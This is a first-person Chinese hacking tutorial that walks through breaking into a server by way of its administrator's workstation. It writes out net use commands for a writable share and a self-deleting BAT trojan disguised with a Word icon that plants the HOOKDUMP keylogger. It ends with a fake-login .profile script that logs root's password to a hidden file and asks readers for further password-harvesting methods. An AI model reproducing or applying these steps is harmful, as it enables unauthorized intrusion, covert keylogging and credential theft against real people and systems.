Once upon a time,我發現了一個網站,於是常規入侵。很好,它的FINGER開著,於是我編了一個SHELL,從aaa帳號試到zzz(bye the way,這是我發現的一個網上規律,那就是帳號的長度與口令的強度成正比,如果一個帳號只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結果一個帳號也不存在,我沒有再試它的帳號。因為我被它開的端口吸引住了,它開著WWW,我就不信它不出錯。一連拿了五種CGI和WWW掃描器總計掃了三四百種常見錯誤它幾乎都不存在,我KAO,I服了YOU!也有幾個錯誤,我不知道如何利用,算了。又繞著主機轉了幾圈,象狐狸遇見刺猬,無從下嘴。
還是看看root的信息吧:finger [email protected]
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root經常來,那個202.xx.xx.xx就是他用的工作站了,從那會不會看到點東西呢?
net view 202.xx.xx.xx
Shared resources at 202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包 Disk
The command was completed successfully.
在上網的機器上開著WINDOWS的“文件和打印機共享”的服務,是很多人容易掉以輕心的,這個root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢,現在開了共享的目錄沒有一個是根目錄,連D驅的都沒有,別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,裡面盡是些英文原著,這個root還挺行的。“我的公文包”吸引了我的注意,這是一個用於將不同的機器上的資料進行同步的工具,很顯然這個root要經常更新主機上的主頁,有時候在自己的機器上編,有時候在主機上編……所以很重要的一點:“我的公文包”的共享一般都是可寫的!
那我再進去看看。
〉net use i: 202.xx.xx.xx
〉i:
〉echo asdf〉temp.txt
不錯,確實可寫
〉del temp.txt
不留痕跡――黑客的習慣
〉dir/od/p
看看都有些什麼……倒數第二排那個是什麼?“X月工作計劃.doc”!就是它了,即然是計劃就不可能寫完了就丟一邊,它肯定會再次打開它的――至少下個月寫計劃時要COPY一下:-〉
該動手了,我的目標就是讓它下次打開時誤中我的陷阱而運行我藏的木馬。我這次用的是一個鍵盤計錄軟件HOOKDUMP,我覺得它挺好的,價錢實惠,量也足……對不起,說習慣了,應該是它不僅記錄下全部擊鍵,還記錄下打開或關掉了什麼程序、按過什麼按紐、用過什麼菜單……總之,它的記錄讓你就和你站在他身後看他操作計算機一樣詳細了。您要問那麼多木馬你為啥裝這個?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟件列為頭號偵查對象,而一個root的機器上可不可能沒裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機會就少了……
〉copy hookdump.* i:
補充一點:上傳前先編好它的hookdump.ini文件,置為隱藏方式運行,不然root一運行屏幕上蹦出一大窗口可就溴大了。
然後再在自己的機器上編一個同名的BAT文件:X月工作計劃.BAT
〉edit c:X月工作計劃.BAT
@echo off
hookdump
attrib -h X月工作計劃.doc
c:progra~1micros~1officewinword X月工作計劃.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root運行了這個BAT文件實際上就是先運行木馬,再調用WINWORD文件打開它想開的這個文件,然後自我刪除,也許它機器上WINWORD的位置不同,那調用就會失敗,不過不要緊,反正BAT會馬上刪除,他會以為是自己的誤操作。
這時你的C驅根目錄就有了這麼一個BAT文件,它是一個方形的圖標,和那個WORD文件大相徑庭,root怎麼會運行它呢?沒關系,在這個文件上點右鍵,點屬性,在“程序”欄選“更改圖標”不就行了嗎?WORD的圖標在你機器c:progra~1micros~1offic中。還要將“運行”改為“最小化”,“退出時關閉”打上勾,這樣才能保證在運行時一點跡象也沒有。事實上這個BAT文件變成了兩個,還有一個PIF文件就是它的圖標。
把這兩個文件傳上去:
〉copy X月工作計劃.bat i:
〉copy X月工作計劃.pif i:
然後把它的文件和自己的文件都藏起來:
〉attrib +h X月工作計劃.doc
〉attrib +h X月工作計劃.bat
這樣,root的“公文包”裡只剩下一個和原來一模一樣的WORD圖標,他做夢也沒想到這已變成了一個BAT文件。然後可以喘口氣了,讓我們靜靜的等……
幾天後,我進入這個工作站,取下記錄下來的擊鍵記錄,找出root的口令,進入主機。
------------------------------------------------------
看明白了嗎?這種入侵方法就是對那些銅牆鐵壁的主機不是強往裡沖而是查操作該主機的root所使用的機器,那是他的“座機”,“舒適”才是他想要的,因此強度也就大大減小。進入他的“座機”後跟蹤他的操作,不就輕易的獲得鑰匙了嗎?順便說一下,其實那個“我的公文包”文件夾的共享是加了口令的,我另費了一番周折才進去,不過這和入侵方式無關,我下回再講怎麼進有口令的共享文件夾。
好了,看在我敲得手指發麻的份上,您也該回答我一個問題了:
條件:已獲得某主機的rootshell,假設名為.fool (-rwsr-xr-x 1 root system 131072 .fool)
目標:獲得該主機root的帳號
提示:方法一:即然已是root,可以裝一個sniffer,嗅探口令,不過主機是Digital 4.0B,常見的esniff,dsniff,sniffit都不能運行,你再推薦一個?
方法二:做一個假LOGIN的SHELL,將原LOGIN程序改名,收集了帳號的口令後調用真的LOGIN程序,但我發現LOGIN程序一旦改名就不能運行了!
方法三:在root的HOME目錄中改它的.profile如下:
clear
echo
echo
echo "Digital UNIX (lwh000) (ttyp0)"
echo
echo "login:root"
echo "Password:"
echo "Login incorrect"
echo "login:c"
read lgin
stty -echo
echo "Password:c"
read pw
stty echo
echo "Login:$lgin - Pword:$pw" 〉〉/tmp/.autobk
echo
echo "Last login: Tue Jul 18 11:05:25 from pa1002"
echo
echo "Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000"
# 中間這一段太長,就不寫了,實際上就是偽裝主機的歡迎詞
echo
echo
# 這以下是root的原.profile
PATH=$HOME/bin:$
export PATH
if [ ! "$DT" ]; then
stty dec
tset -I -Q
fi
看出來沒,實際上root正確登錄後,第一句clear擦掉歡迎詞,然後偽寫登錄不成功,讓他再輸一次,然後記錄下來,再偽寫上歡迎詞,執行正常的.profile內容。
但是TELNET反應是較慢的,第一句clear再快也能看出屏幕有一個閃爍,細心的root也許會留意,如果能關掉UNIX的歡迎詞就好了,怎麼做?
當然,只要能達成目標,您盡可以提出您的方法,不要拘泥於我想的這幾種。